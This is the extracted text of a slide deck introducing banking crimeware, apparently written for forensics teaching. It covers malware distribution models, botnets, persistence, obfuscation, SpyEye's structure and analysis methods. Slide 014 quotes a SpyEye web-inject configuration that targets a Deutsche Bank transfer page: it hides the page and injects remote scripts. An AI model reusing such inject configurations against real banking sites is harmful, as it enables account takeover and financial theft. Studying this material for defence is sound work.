INTRODUCTION TO CRIMEWARE IN THE BANKING SECTOR
This term refers to the subset of malware that seeks to steal data from electronic bank accounts. In this context, other financial services, such as online stock exchange operations, are also considered electronic banking.
001
002
003
Malware Development
004
Malware Distribution
User
005
Malware Distribution
Pay-per-Install
Drive-by-Download
Exploit-as-a-Service
006
Pay-per-Install Cycle
Exploit-as-a-Service
007
Exploit Pack
<script var a= var xl if(xls
Infection
008
Flat Botnet
P2P Botnet
009
Making the malware persistent
(e.g., by modifying the registry)
Injection
010
Smell of $$$
data theft
User
011
012
Obfuscation
013
SpyEye Structure
C&C
Packer Obfuscation Anti-Dbg
Binary
014
set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP
data_before
<body
data_end
data_inject
style="visibility:hidden
data_end
data_after
id=
data_end
data_before
</body>
data_end
data_inject
<script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script>
<script src='/error.html/trxm1/dbcommon.js'></script>
<script src='/error.html/trxm1/dbsepa.js'></script>
<script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script>
data_end
data_after
</html>
data_end
..
015
016
017
User
To whom the data collected by the malware is sent, as defined in collectors.txt
018
MW Analysis
Live Analysis
File Analysis
Disassembling
Debugging
Memory Dumping
THANK YOU
Francesco Schifilliti
fschifilliti@forensictech.it